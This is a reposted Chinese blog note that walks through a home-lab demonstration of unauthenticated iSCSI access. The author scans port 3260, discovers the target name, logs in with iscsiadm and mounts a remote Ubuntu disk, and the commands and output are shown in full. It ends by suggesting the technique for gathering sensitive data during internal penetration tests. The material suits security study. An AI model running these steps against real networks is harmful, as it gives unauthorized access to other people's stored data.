转载

Hacking iSCSI

前几日看到入侵 Hacking Team 的文章，其中最大的一个突破口就是 iSCSI 未授权访问。那么，什么是 iSCSI，又如何在内网渗透的时候利用 iSCSI 获取敏感信息？于是嗯哼，做笔记呗..

PS: 虽然题目起了一个 Hacking iSCSI，但是实际上就是一个未授权访问而已。

如果有兴趣可以了解一下什么是 SCSI 协议，以及什么是 iSCSI 。

0x00

服务端

IP: 10.211.55.18   OS: Ubuntu

为了减少水表几率，我还是一个内网的 iSCSI 环境比较好。首先安装 iscsitarget：

apt-get install iscsitarget

修改 /etc/default/iscsitarget：

# cat /etc/default/iscsitarget  ISCSITARGET_ENABLE=true  ISCSITARGET_MAX_SLEEP=3    # ietd options  # See ietd(8) for details  ISCSITARGET_OPTIONS=""

修改 /etc/iet/ietd.conf：

Target iqn.2016-04.local.test:storage Lun 1 Path=/dev/sda,Type=fileio,ScsiId=lun1,ScsiSN=lun1

接着重启服务：

# service iscsitarget restart  * Removing iSCSI enterprise target devices:           [ OK ]  * Starting iSCSI enterprise target service            [ OK ]

运行 netstat -anp | grep 3260 发现已经开启服务了。

# netstat -anp | grep 3260  tcp        0      0 0.0.0.0:3260            0.0.0.0:*               LISTEN      7265/ietd  tcp6       0      0 :::3260                 :::*                    LISTEN      7265/ietd

客户端

IP: 10.211.55.20 OS: CentOS

安装 scsi-target-utils：

yum install scsi-target-utils

0x01

以下为过程：

[root@localhost yum.repos.d]# nmap 10.211.55.18 -p3260  Starting Nmap 5.51 ( http://nmap.org ) at 2016-04-21 19:03 HKT Nmap scan report for 10.211.55.18 Host is up (0.00031s latency). PORT     STATE SERVICE 3260/tcp open  iscsi MAC Address: 00:1C:42:D8:D3:48 (Parallels)  Nmap done: 1 IP address (1 host up) scanned in 13.42 seconds

发现已经开始 3260 端口，接着用 iscsiadm -m discovery 获取 iqn（iSCSI Qualified Name）。

[root@localhost tmp]# iscsiadm -m discovery -t sendtargets -p 10.211.55.18 10.211.55.18:3260,1 iqn.2016-04.local.test:storage

利用 iscsiadm 挂载：

[root@localhost yum.repos.d]# iscsiadm -m node -T iqn.2016-04.local.test:storage -p 10.211.55.18 -l Logging in to [iface: default, target: iqn.2016-04.local.test:storage, portal: 10.211.55.18,3260] (multiple) Login to [iface: default, target: iqn.2016-04.local.test:storage, portal: 10.211.55.18,3260] successful.

fdisk -l 检测是否已经存在：

[root@localhost yum.repos.d]# fdisk -l ...  Disk /dev/sdb: 68.7 GB, 68719476736 bytes  <-- HERE! 255 heads, 63 sectors/track, 8354 cylinders Units = cylinders of 16065 * 512 = 8225280 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes Disk identifier: 0x0009be13     Device Boot      Start         End      Blocks   Id  System /dev/sdb1   *           1        8225    66059264   83  Linux /dev/sdb2            8225        8355     1046529    5  Extended /dev/sdb5            8225        8355     1046528   82  Linux swap / Solaris [root@localhost yum.repos.d]#

接着挂载：

[root@localhost tmp]# mkdir /tmp/test [root@localhost tmp]# mount  /dev/sdb1 /tmp/test/ [root@localhost tmp]# cd /tmp/test/etc [root@localhost tmp]# cat issue Ubuntu 12.04.5 LTS /n /l

发现已经挂在了 Ubuntu 的硬盘。

如上所示，如果在内网中发现开启的 3260 端口，可以尝试挂载其硬盘。可以获取很多敏感信息。其中 Hacking Team 就是因为泄露了邮件服务器导致 boom。